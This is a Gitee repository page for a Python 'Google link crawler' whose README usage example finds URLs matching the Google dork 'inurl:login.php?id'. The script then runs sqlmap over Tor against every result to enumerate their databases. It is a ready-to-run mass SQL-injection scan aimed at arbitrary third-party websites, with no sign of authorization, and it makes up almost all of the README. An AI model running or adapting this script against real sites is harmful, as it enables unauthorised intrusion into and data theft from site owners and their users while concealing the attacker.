# GoogleSpider **Repository Path**: twfb/GoogleSpider ## Basic Information - **Project Name**: GoogleSpider - **Description**: 谷歌链接爬虫 - **Primary Language**: Python - **License**: Not specified - **Default Branch**: master - **Homepage**: None - **GVP Project**: No ## Statistics - **Stars**: 0 - **Forks**: 0 - **Created**: 2020-09-19 - **Last Updated**: 2020-12-19 ## Categories & Tags **Categories**: Uncategorized **Tags**: None ## README ### 用法 ``` import os from google import GoogleSpider def sqlmqp_google(): with open('google.txt', 'r') as f: urls = f.read().split('\n') for i in urls: os.system( 'sqlmap -u {} –batch --thread 10 --dbs --beep --level 3 --tor'.format(i)) if __name__ == "__main__": if not os.path.exists('google.txt'): google_spider = GoogleSpider( keyword='inurl:login.php?id', proxy_server='socks5://127.0.0.1:9090', ) google_spider.start() sqlmqp_google() ```